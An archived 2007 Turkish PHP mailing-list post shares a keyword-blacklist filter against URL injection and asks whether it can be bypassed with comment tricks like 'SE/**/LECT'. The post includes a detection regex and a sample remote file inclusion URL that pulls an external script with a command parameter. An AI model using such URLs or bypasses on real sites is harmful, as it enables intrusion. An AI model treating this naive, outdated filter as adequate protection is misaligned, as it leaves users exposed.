[Linux-programlama] URL saldırılarına karşı

New Message	Reply	About this list	Date view	Thread view	Subject view	Author view	Attachment view

From: huseyin mert (huseyinin@gmail.com)
Date: Mon 27 Aug 2007 - 09:35:37 EEST

Previous message: M.ATIF CEYLAN: "[Linux-programlama] Re: !!***SPAM***!! Re:Postgresql ve Ram Kullanımı"
Next in thread: Onur Yerlikaya: "[Linux-programlama] Re: URL saldÄ±rÄ±larÄ±na karÅŸÄ±"

<?php

// ====================================================================
//
// Avoid URL injection code. Easy to improve the security (phising, etc..)
// of all your site when if are calling one .php to centralize all your
// DB connections.
//
// mailto: Vicente<sysvic@gmail.com>
//
// ====================================================================

$req = $_SERVER['REQUEST_URI'];
$cadena = explode </manual/function.explode.php>("?", $req);
$mi_url = $cadena[0];
$resto = $cadena[1];

// here you can put your suspicions chains at your will. Just be careful of
// possible coincidences with your URL's variables and parameters
$inyecc=
'/script|http|<|>|%3c|%3e|SELECT|UNION|UPDATE|AND|exe|exec|INSERT|tmp/i';

// detecting
if (preg_match </manual/function.preg-match.php>($inyecc, $resto)) {

   // make something, in example send an e-mail alert to administrator
   $ip = $HTTP_SERVER_VARS["HTTP_CLIENT_IP"];
   $forwarded = $HTTP_SERVER_VARS["HTTP_X_FORWARDED_FOR"];
   $remoteaddress = $HTTP_SERVER_VARS["REMOTE_ADDR"];

   $message = "attack injection in $mi_url nnchain: $resto nn
   from: (ip-forw-RA):- $ip - $forwarded - $remoteaddressnn
   --------- end --------------------";

mail </manual/function.mail.php>("youremail@email.com",
"Attack injection", $message,
"From: host@{$_SERVER['SERVER_NAME']}",
"-fwebmaster@{$_SERVER['SERVER_NAME']}");

   // message and kill execution
   echo 'illegal url';
   die();
}

// From here you can start safely your DB connection
$connection=mysql_connect </manual/function.mysql-connect.php>(); //..etc.

Usage Example

* URL Attack:
http://www.mydomain.com/index.php?page=http://www.geocities.com/df_animes/tool25.txt?&cmd=w

* Response:
"illegal url"

* E-mail sent to administrator:

attack injection in /home/mydomain/public_html/index.php

chain: /index.php?page=http://www.geocities.com/df_animes/tool25.txt?&cmd=w

from: (ip-forw-RA): - - 85.50.130.156
-----------------------------------------------------------
orjinal adresi:http://www.zend.com/code/codex.php?id=1543&single=1

zend de bulduğum bir kod çok hoşuma gitti acaba ne kadar güvenlik sağlar
diye fikirlerinizi bekliyorum.
ilk olarak aklıma gelen SELECT yerine SE/**/LECT yazarak geçilip
geçilemeyeceği?

_______________________________________________
Linux-programlama mailing list
Linux-programlama@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-programlama

Previous message: M.ATIF CEYLAN: "[Linux-programlama] Re: !!***SPAM***!! Re:Postgresql ve Ram Kullanımı"
Next in thread: Onur Yerlikaya: "[Linux-programlama] Re: URL saldÄ±rÄ±larÄ±na karÅŸÄ±"

New Message	Reply	About this list	Date view	Thread view	Subject view	Author view	Attachment view

Bu arsiv hypermail 2.1.2 tarafindan uretilmistir.